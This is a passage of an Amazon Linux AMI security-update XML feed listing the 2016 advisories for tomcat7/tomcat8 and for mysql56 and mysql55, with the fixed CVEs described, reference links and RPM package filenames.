arch="i686"><filename>Packages/squid-debuginfo-3.1.23-16.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-736</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-736: medium priority package update for tomcat7 tomcat8</title><issued date="2016-08-17 13:30:00" /><updated date="2016-08-17 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3092:
A denial of service vulnerability was identified in Commons FileUpload that occurred when the length of the multipart boundary was just below the size of the buffer (4096 bytes) used to read the uploaded file if the boundary was the typical tens of bytes long.
1349468:
CVE-2016-3092 tomcat: Usage of vulnerable FileUpload package can result in denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3092" title="" id="CVE-2016-3092" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-servlet-3.0-api" version="7.0.70" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.70-1.18.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.70" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.70-1.18.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.70" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.70-1.18.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.70" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.70-1.18.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.70" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.70-1.18.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.70" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.70-1.18.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.70" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.70-1.18.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.70" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.70-1.18.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.70" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.70-1.18.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.70" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.70-1.18.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.0.36" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.0.36-1.62.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.0.36" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.0.36-1.62.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.0.36" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.0.36-1.62.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.0.36" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.0.36-1.62.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.0.36" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.0.36-1.62.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.0.36" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.0.36-1.62.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.0.36" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.0.36-1.62.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.0.36" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.0.36-1.62.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.0.36" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.0.36-1.62.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.0.36" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.0.36-1.62.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-737</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-737: important priority package update for mysql56</title><issued date="2016-08-17 13:30:00" /><updated date="2016-08-17 13:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5440:
Unspecified vulnerability in Oracle MySQL 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier and MariaDB before 5.5.50, 10.0.x before 10.0.26, and 10.1.x before 10.1.15 allows remote administrators to affect availability via vectors related to Server: RBR.
1358218:
CVE-2016-5440 mysql: unspecified vulnerability in subcomponent: Server: RBR (CPU July 2016)
CVE-2016-5439:
Unspecified vulnerability in Oracle MySQL 5.6.30 and earlier and 5.7.12 and earlier allows remote administrators to affect availability via vectors related to Server: Privileges.
1358216:
CVE-2016-5439 mysql: unspecified vulnerability in subcomponent: Server: Privileges (CPU July 2016)
CVE-2016-3615:
Unspecified vulnerability in Oracle MySQL 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier and MariaDB before 5.5.50, 10.0.x before 10.0.26, and 10.1.x before 10.1.15 allows remote authenticated users to affect availability via vectors related to Server: DML.
1358212:
CVE-2016-3615 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU July 2016)
CVE-2016-3614:
Unspecified vulnerability in Oracle MySQL 5.6.30 and earlier and 5.7.12 and earlier allows remote authenticated users to affect availability via vectors related to Server: Security: Encryption.
1358211:
CVE-2016-3614 mysql: unspecified vulnerability in subcomponent: Server: Security: Encryption (CPU July 2016)
CVE-2016-3521:
Unspecified vulnerability in Oracle MySQL 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier and MariaDB before 5.5.50, 10.0.x before 10.0.26, and 10.1.x before 10.1.15 allows remote authenticated users to affect availability via vectors related to Server: Types.
1358209:
CVE-2016-3521 mysql: unspecified vulnerability in subcomponent: Server: Types (CPU July 2016)
CVE-2016-3501:
Unspecified vulnerability in Oracle MySQL 5.6.30 and earlier and 5.7.12 and earlier allows remote authenticated users to affect availability via vectors related to Server: Optimizer.
1358207:
CVE-2016-3501 mysql: unspecified vulnerability in subcomponent: Server: Optimizer (CPU July 2016)
CVE-2016-3486:
Unspecified vulnerability in Oracle MySQL 5.6.30 and earlier and 5.7.12 and earlier allows remote authenticated users to affect availability via vectors related to Server: FTS.
1358206:
CVE-2016-3486 mysql: unspecified vulnerability in subcomponent: Server: FTS (CPU July 2016)
CVE-2016-3477:
Unspecified vulnerability in Oracle MySQL 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier and MariaDB before 5.5.50, 10.0.x before 10.0.26, and 10.1.x before 10.1.15 allows local users to affect confidentiality, integrity, and availability via vectors related to Server: Parser.
1358205:
CVE-2016-3477 mysql: unspecified vulnerability in subcomponent: Server: Parser (CPU July 2016)
CVE-2016-3459:
Unspecified vulnerability in Oracle MySQL 5.6.30 and earlier and 5.7.12 and earlier and MariaDB 10.0.x before 10.0.25 and 10.1.x before 10.1.14 allows remote administrators to affect availability via vectors related to Server: InnoDB.
1358202:
CVE-2016-3459 mysql: unspecified vulnerability in subcomponent: Server: InnoDB (CPU July 2016)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3459" title="" id="CVE-2016-3459" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3477" title="" id="CVE-2016-3477" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3486" title="" id="CVE-2016-3486" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3501" title="" id="CVE-2016-3501" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3521" title="" id="CVE-2016-3521" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3614" title="" id="CVE-2016-3614" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3615" title="" id="CVE-2016-3615" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5439" title="" id="CVE-2016-5439" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5440" title="" id="CVE-2016-5440" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56-test" version="5.6.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.32-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.32-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.32-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.32-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.32-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.32-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.32-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.32-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.32-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.32-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.32-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.32-1.16.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.32-1.16.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.32-1.16.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.32-1.16.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.32-1.16.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.32-1.16.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.32-1.16.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.32-1.16.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.32-1.16.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.32-1.16.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.32-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-738</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-738: important priority package update for mysql55</title><issued date="2016-08-17 13:30:00" /><updated date="2016-08-17 13:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5444:
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier and MariaDB before 5.5.49, 10.0.x before 10.0.25, and 10.1.x before 10.1.14 allows remote attackers to affect confidentiality via vectors related to Server: Connection.
1358223:
CVE-2016-5444 mysql: unspecified vulnerability in subcomponent: Server: Connection (CPU July 2016)
CVE-2016-5440:
Unspecified vulnerability in Oracle MySQL 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier and MariaDB before 5.5.50, 10.0.x before 10.0.26, and 10.1.x before 10.1.15 allows remote administrators to affect availability via vectors related to Server: RBR.
1358218:
CVE-2016-5440 mysql: unspecified vulnerability in subcomponent: Server: RBR (CPU July 2016)
CVE-2016-3615:
Unspecified vulnerability in Oracle MySQL 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier and MariaDB before 5.5.50, 10.0.x before 10.0.26, and 10.1.x before 10.1.15 allows remote authenticated users to affect availability via vectors related to Server: DML.
1358212:
CVE-2016-3615 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU July 2016)
CVE-2016-3521:
Unspecified vulnerability in Oracle MySQL 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier and MariaDB before 5.5.50, 10.0.x before 10.0.26, and 10.1.x before 10.1.15 allows remote authenticated users to affect availability via vectors related to Server: Types.
1358209:
CVE-2016-3521 mysql: unspecified vulnerability in subcomponent: Server: Types (CPU July 2016)
CVE-2016-3477:
Unspecified vulnerability in Oracle MySQL 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier and MariaDB before 5.5.50, 10.0.x before 10.0.26, and 10.1.x before 10.1.15 allows local users to affect confidentiality, integrity, and availability via vectors related to Server: Parser.
1358205:
CVE-2016-3477 mysql: unspecified vulnerability in subcomponent: Server: Parser (CPU July 2016)
CVE-2016-3452:
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.10 and earlier and MariaDB before 5.5.49, 10.0.x before 10.0.25, and 10.1.x before 10.1.14 allows remote attackers to affect confidentiality via vectors related to Server: Security: Encryption.
1358201:
CVE-2016-3452 mysql: unspecified vulnerability in subcomponent: Server: Security: Encryption (CPU July 2016)
CVE-2016-2047:
The ssl_verify_server_cert function in sql-common/client.c in MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10; Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier; and Percona Server do not properly verify that the server hostname matches a domain name in the subject&#039;s Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a &quot;/CN=&quot; string in a field in a certificate, as demonstrated by &quot;/OU=/CN=bar.com/CN=foo.com.&quot;
It was found that the MariaDB client library did not properly check host names against server identities noted in the X.509 certificates when establishing secure connections using TLS/SSL. A man-in-the-middle attacker could possibly use this flaw to impersonate a server to a client.
1301874:
CVE-2016-2047 mysql: ssl-validate-cert incorrect hostname check
CVE-2016-0666:
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier and MariaDB before 5.5.49, 10.0.x before 10.0.25, and 10.1.x before 10.1.14 allows local users to affect availability via vectors related to Security: Privileges.
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier allows local users to affect availability via vectors related to Security: Privileges.
1329270:
CVE-2016-0666 mysql: unspecified vulnerability in subcomponent: Server: Security: Privileges (CPU April 2016)
CVE-2016-0651:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier allows local users to affect availability via vectors related to Optimizer.
1329254:
CVE-2016-0651 mysql: unspecified vulnerability in subcomponent: Server: Optimizer (CPU April 2016)
CVE-2016-0650:
Unspecified vulnerability in Oracle MySQL 5.5.47 and earlier, 5.6.28 and earlier, and 5.7.10 and earlier and MariaDB before 5.5.48, 10.0.x before 10.0.24, and 10.1.x before 10.1.12 allows local users to affect availability via vectors related to Replication.
1329253:
CVE-2016-0650 mysql: unspecified vulnerability in subcomponent: Server: Replication (CPU April 2016)
CVE-2016-0649:
Unspecified vulnerability in Oracle MySQL 5.5.47 and earlier, 5.6.28 and earlier, and 5.7.10 and earlier and MariaDB before 5.5.48, 10.0.x before 10.0.24, and 10.1.x before 10.1.12 allows local users to affect availability via vectors related to PS.
1329252:
CVE-2016-0649 mysql: unspecified vulnerability in subcomponent: Server: PS (CPU April 2016)
CVE-2016-0648:
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier and MariaDB before 5.5.49, 10.0.x before 10.0.25, and 10.1.x before 10.1.14 allows local users to affect availability via vectors related to PS.
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier allows local users to affect availability via vectors related to PS.
1329251:
CVE-2016-0648 mysql: unspecified vulnerability in subcomponent: Server: PS (CPU April 2016)
CVE-2016-0647:
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier and MariaDB before 5.5.49, 10.0.x before 10.0.25, and 10.1.x before 10.1.14 allows local users to affect availability via vectors related to FTS.
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier allows local users to affect availability via vectors related to FTS.
1329249:
CVE-2016-0647 mysql: unspecified vulnerability in subcomponent: Server: FTS (CPU April 2016)
CVE-2016-0646:
Unspecified vulnerability in Oracle MySQL 5.5.47 and earlier, 5.6.28 and earlier, and 5.7.10 and earlier and MariaDB before 5.5.48, 10.0.x before 10.0.24, and 10.1.x before 10.1.12 allows local users to affect availability via vectors related to DML.
1329248:
CVE-2016-0646 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU April 2016)
CVE-2016-0644:
Unspecified vulnerability in Oracle MySQL 5.5.47 and earlier, 5.6.28 and earlier, and 5.7.10 and earlier and MariaDB before 5.5.48, 10.0.x before 10.0.24, and 10.1.x before 10.1.12 allows local users to affect availability via vectors related to DDL.
1329247:
CVE-2016-0644 mysql: unspecified vulnerability in subcomponent: Server: DDL (CPU April 2016)
CVE-2016-0643:
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier and MariaDB before 5.5.49, 10.0.x before 10.0.25, and 10.1.x before 10.1.14 allows local users to affect confidentiality via vectors related to DML.
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier allows local users to affect confidentiality via vectors related to DML.
1329245:
CVE-2016-0643 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU April 2016)
CVE-2016-0642:
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier allows local users to affect integrity and availability via vectors related to Federated.
1329243:
CVE-2016-0642 mysql: unspecified vulnerability in subcomponent: Server: Federated (CPU April 2016)
CVE-2016-0641:
Unspecified vulnerability in Oracle MySQL 5.5.47 and earlier, 5.6.28 and earlier, and 5.7.10 and earlier and MariaDB before 5.5.48, 10.0.x before 10.0.24, and 10.1.x before 10.1.12 allows local users to affect confidentiality and availability via vectors related to MyISAM.
1329241:
CVE-2016-0641 mysql: unspecified vulnerability in subcomponent: Server: MyISAM (CPU April 2016)
CVE-2016-0640:
Unspecified vulnerability in Oracle MySQL 5.5.47 and earlier, 5.6.28 and earlier, and 5.7.10 and earlier and MariaDB before 5.5.48, 10.0.x before 10.0.24, and 10.1.x before 10.1.12 allows local users to affect integrity and availability via vectors related to DML.
1329239:
CVE-2016-0640 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU April 2016)
CVE-2016-0616:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
1301510:
CVE-2016-0616 mysql: unspecified vulnerability in subcomponent: Server: Optimizer (CPU January 2016)
CVE-2016-0609:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to privileges.
1301507:
CVE-2016-0609 mysql: unspecified vulnerability in subcomponent: Server: Security: Privileges (CPU January 2016)
CVE-2016-0608:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via vectors related to UDF.
1301506:
CVE-2016-0608 mysql: unspecified vulnerability in subcomponent: Server: UDF (CPU January 2016)
CVE-2016-0606:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect integrity via unknown vectors related to encryption.
1301504:
CVE-2016-0606 mysql: unspecified vulnerability in subcomponent: Server: Security: Encryption (CPU January 2016)
CVE-2016-0600:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
1301501:
CVE-2016-0600 mysql: unspecified vulnerability in subcomponent: Server: InnoDB (CPU January 2016)
CVE-2016-0598:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via vectors related to DML.
1301498:
CVE-2016-0598 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU January 2016)
CVE-2016-0597:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
1301497:
CVE-2016-0597 mysql: unspecified vulnerability in subcomponent: Server: Optimizer (CPU January 2016)
CVE-2016-0596:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier and 5.6.27 and earlier and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via vectors related to DML.
1301496:
CVE-2016-0596 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU January 2016)
CVE-2016-0546:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Client. NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that these are multiple buffer overflows in the mysqlshow tool that allow remote database servers to have unspecified impact via a long table or database name.
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Client.
1301493:
CVE-2016-0546 mysql: unspecified vulnerability in subcomponent: Client (CPU January 2016)
CVE-2016-0505:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to Options.
1301492:
CVE-2016-0505 mysql: unspecified vulnerability in subcomponent: Server: Options (CPU January 2016)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0505" title="" id="CVE-2016-0505" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0546" title="" id="CVE-2016-0546" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0596" title="" id="CVE-2016-0596" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0597" title="" id="CVE-2016-0597" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0598" title="" id="CVE-2016-0598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0600" title="" id="CVE-2016-0600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0606" title="" id="CVE-2016-0606" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0608" title="" id="CVE-2016-0608" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0609" title="" id="CVE-2016-0609" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0616" title="" id="CVE-2016-0616" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0640" title="" id="CVE-2016-0640" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0641" title="" id="CVE-2016-0641" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0642" title="" id="CVE-2016-0642" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0643" title="" id="CVE-2016-0643" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0644" title="" id="CVE-2016-0644" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0646" title="" id="CVE-2016-0646" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0647" title="" id="CVE-2016-0647" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0648" title="" id="CVE-2016-0648" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0649" title="" id="CVE-2016-0649" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0650" title="" id="CVE-2016-0650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0651" title="" id="CVE-2016-0651" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0666" title="" id="CVE-2016-0666" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2047" title="" id="CVE-2016-2047" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3452" title="" id="CVE-2016-3452" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3477" title="" id="CVE-2016-3477" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3521" title="" id="CVE-2016-3521" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3615" title="" id="CVE-2016-3615" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5440" title="" id="CVE-2016-5440" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5444" title="" id="CVE-2016-5444" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql-config" version="5.5.51" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-config-5.5.51-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.51" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.51-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.51" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.51-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.51" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.51-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.51" release="1.11.amzn1" epoch="0" 